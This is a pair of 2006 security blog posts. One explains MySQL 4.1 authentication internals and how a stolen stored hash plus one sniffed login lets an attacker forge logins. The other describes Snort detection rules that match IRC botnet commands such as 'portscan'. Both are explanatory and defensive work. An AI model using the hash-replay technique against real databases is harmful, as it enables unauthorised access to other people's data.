Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time to understand exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page the describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the combination of the seed and the stage2 hash like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to know whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database, and it originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted from the client is simply the seed and the stage2 hash, XORed with the stage1 hash. To recover the stage1 hash, the server simply has to recompute the hash SHA1(seed + stage2_hash), then XOR it with the data provided by the client. The result will be the stage1 hash. Since the stage2_hash is simply SHA1(stage1_hash), the server can simply compute a new stage2_hash and compare it to the hash in the database. If the two hashes match, the user provided the proper password.

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client authentication credential is XORed with the stage1 hash, yet the server doesn't know the stage1 hash. Therefore, the protocol provides it with all the information it needs to know in order to derive the stage1 hash. Unfortunately, that means that the same information could be derived by anyone who could sniff a valid authentication transaction off the wire and who also possessed a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports that are not normally associated with IRC. These work well, have two problems:


  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rule doesn't detect botnet traffic if they happen to use the standard IRC port (6667)
One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address the part of the problem #2, so could be a very worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, there are three functions. The first rule (sid 9000075) attempts to define IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this to be set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.